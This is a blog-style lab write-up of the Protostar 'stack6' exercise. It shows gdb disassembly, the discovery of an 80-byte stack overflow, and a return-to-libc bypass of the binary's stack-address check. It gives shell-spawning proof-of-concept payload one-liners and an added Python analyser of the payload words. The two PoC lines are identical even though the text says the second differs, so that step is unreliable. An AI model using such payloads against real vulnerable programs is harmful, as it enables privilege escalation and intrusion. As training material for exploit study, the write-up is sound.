Tuesday, November 22, 2016

Exploit Exercises - Protostar Stack 6

It is free time, so I had some time to play exploit-exercises. Today I play at stack level 6. I learned something new here about return-to-libc.
Use gdb to disassemble the binary:
#gdb -q /opt/protostar/bin/stack6
(gdb) disas main
Dump of assembler code for function main:
0x080484fa:    push   %ebp
0x080484fb:    mov    %esp,%ebp
0x080484fd:    and    $0xfffffff0,%esp
0x08048500:    call   0x8048484 <getpath>
0x08048505:    mov    %ebp,%esp
0x08048507:    pop    %ebp
0x08048508:    ret
End of assembler dump.
(gdb) disas getpath
Dump of assembler code for function getpath:
0x08048484:    push   %ebp
0x08048485:    mov    %esp,%ebp
0x08048487:    sub    $0x68,%esp
0x0804848a:    mov    $0x80485d0,%eax
0x0804848f:    mov    %eax,(%esp)
0x08048492:    call   0x80483c0
0x08048497:    mov    0x8049720,%eax
0x0804849c:    mov    %eax,(%esp)
0x0804849f:    call   0x80483b0
0x080484a4:    lea    -0x4c(%ebp),%eax
0x080484a7:    mov    %eax,(%esp)
0x080484aa:    call   0x8048380
0x080484af:    mov    0x4(%ebp),%eax
0x080484b2:    mov    %eax,-0xc(%ebp)
0x080484b5:    mov    -0xc(%ebp),%eax
0x080484b8:    and    $0xbf000000,%eax
0x080484bd:    cmp    $0xbf000000,%eax
0x080484c2:    jne    0x80484e4
0x080484c4:    mov    $0x80485e4,%eax
0x080484c9:    mov    -0xc(%ebp),%edx
0x080484cc:    mov    %edx,0x4(%esp)
0x080484d0:    mov    %eax,(%esp)
0x080484d3:    call   0x80483c0
0x080484d8:    movl   $0x1,(%esp)
0x080484df:    call   0x80483a0 <_exit@plt>
0x080484e4:    mov    $0x80485f0,%eax
0x080484e9:    lea    -0x4c(%ebp),%edx
0x080484ec:    mov    %edx,0x4(%esp)
0x080484f0:    mov    %eax,(%esp)
0x080484f3:    call   0x80483c0
0x080484f8:    leave
0x080484f9:    ret
End of assembler dump.

Set breakpoints at the call to getpath in main (0x08048500) and at getpath+116 (0x080484f8, the leave just before ret), i.e. right before getpath returns to main with the overflowed frame:
(gdb) info breakpoints 
Num     Type           Disp Enb Address    What
1       breakpoint     keep y   0x08048500 in main at stack6/stack6.c:27
        breakpoint already hit 1 time
2       breakpoint     keep y   0x080484f8 in getpath at stack6/stack6.c:23
        breakpoint already hit 1 time
Generate the payload. I used the Metasploit pattern tool to find the padding; it is 80 bytes.
python -c 'print "A"*80+ "BBBB"'
It crashed with eip pointing to 0x42424242, so control of eip is done.
When you review the source code, you will see that it checks that the return address is not in the 0xbfxxxxxx range (the stack). So to exploit it you need return-to-libc (many tutorials use ROP; I think it is not needed).
In gdb, get the function addresses with:
(gdb) p system
(gdb) p exit
This is the payload layout.
Set the string for system()'s argument in an environment variable: export SHELL2='/bin/sh'. Then get the address of that environment entry and add 7 (len("SHELL2=") = 7) to skip the variable name.
| "A"*80 to fill | system() address |  exit() address | /bin/sh address |
Use the (payload; cat) | stack6 trick to keep the shell open after it is spawned.
This is the PoC using the environment variable: (python -c 'print "A"*80+"\xb0\xff\xec\xb7"+"\xc0\x60\xec\xb7"+"\xc8\xf6\xff\xbf"+"/bin/sh"';cat) | /opt/protostar/bin/stack6
Then I wanted /bin/sh inside the PoC itself, so I chose to put the /bin/sh string at the end of the payload:
| "A"*80 to fill | system() address |  exit() address | /bin/sh address | /bin/sh string |
Find its address with a gdb memory dump, then add 0x30 to get the address in the real (non-gdb) process.
This is the PoC:
(python -c 'print "A"*80+"\xb0\xff\xec\xb7"+"\xc0\x60\xec\xb7"+"\xc8\xf6\xff\xbf"+"/bin/sh"';cat) | /opt/protostar/bin/stack6
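As an added example (not from the original post), the following reimplements the return-address check seen in getpath's disassembly (and $0xbf000000 / cmp $0xbf000000) and applies it to the words of the PoC above. It shows why the filter only stops a return straight into the stack: a libc address such as 0xb7ecffb0 passes, and only the first word after the saved ebp is ever inspected. The payload bytes and the 80-byte padding are the ones stated in the post.

```python
import struct

# Mask and value taken from getpath: and $0xbf000000,%eax ; cmp $0xbf000000,%eax
STACK_TAG = 0xbf000000
PADDING = 80  # padding length found in the post


def getpath_rejects(ret_addr):
    """True when getpath would print bzzzt and _exit(1) instead of returning."""
    return (ret_addr & STACK_TAG) == STACK_TAG


def frame_words(payload, padding=PADDING):
    """Split the bytes that overwrite the saved return address and beyond
    into 32-bit little-endian words (a trailing partial word is dropped)."""
    tail = payload[padding:]
    return [struct.unpack('<I', tail[i:i + 4])[0]
            for i in range(0, len(tail) - len(tail) % 4, 4)]


def analyse(payload, padding=PADDING):
    """Report the one word getpath checks (mov 0x4(%ebp),%eax) and whether it
    is rejected; everything after it (fake return address, pointer argument,
    inline string) is never inspected by the binary."""
    words = frame_words(payload, padding)
    return {
        'checked': words[0],
        'rejected': getpath_rejects(words[0]),
        'unchecked': words[1:],
    }


# Constructed inputs: the "BBBB" crash test and the PoC bytes from the post,
# plus a payload that returns directly into the stack for comparison.
CRASH_TEST = b"A" * 80 + b"BBBB"
RET2LIBC = (b"A" * 80 + b"\xb0\xff\xec\xb7" + b"\xc0\x60\xec\xb7"
            + b"\xc8\xf6\xff\xbf" + b"/bin/sh")
STACK_RET = b"A" * 80 + b"\xc8\xf6\xff\xbf"

if __name__ == "__main__":
    for name, p in (("BBBB", CRASH_TEST), ("ret2libc", RET2LIBC), ("stack", STACK_RET)):
        r = analyse(p)
        print("%-9s ret=0x%08x rejected=%s" % (name, r['checked'], r['rejected']))
```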


----------------------------------------------------------
Thanks for reading
to be continued - I will update more.

